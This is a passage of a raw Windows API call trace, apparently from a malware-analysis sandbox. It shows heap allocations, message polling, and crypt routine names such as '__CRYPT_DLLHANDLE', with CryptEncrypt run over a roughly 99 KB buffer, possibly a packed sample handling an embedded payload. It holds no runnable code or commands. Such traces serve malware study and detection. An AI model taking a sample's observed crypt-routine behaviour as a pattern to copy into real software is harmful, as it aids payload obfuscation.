lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0042.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0042.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0042.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0042.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0042.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0042.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0042.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0042.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0042.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0042.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0042.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.969] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0042.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0042.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0042.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0042.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0042.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0042.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0042.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0042.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0042.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0042.970] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0042.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0042.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0042.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0042.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0042.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0042.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.970] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb68 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.971] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0042.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0042.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0042.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0042.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0042.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0042.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0042.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0042.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0042.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0042.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0042.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0042.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0042.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0042.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0042.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0042.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0042.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0042.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0042.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0042.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0042.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0042.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0042.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0042.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0042.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0042.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0042.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0042.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0042.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0042.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0042.974] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0042.974] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da268, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da268*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0042.974] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.974] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.974] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.974] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.974] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.974] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.974] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.974] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.974] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0042.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.975] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.975] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.975] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.975] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.975] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.975] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.975] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.975] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0042.975] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.975] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.975] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.975] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.975] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.975] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0042.975] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.976] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.976] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x182dc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x182e0) returned 1 [0042.976] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.976] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.976] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.977] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.977] CharLowerBuffW (in: lpsz="byte[99041]", cchLength=0xb | out: lpsz="byte[99041]") returned 0xb [0042.977] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.979] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.979] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.979] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.981] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.981] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9655d8*, pdwDataLen=0x6ae220*=0x182dc, dwBufLen=0x182e0 | out: pbData=0x9655d8*, pdwDataLen=0x6ae220*=0x182e0) returned 1 [0042.982] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.982] PeekMessageW 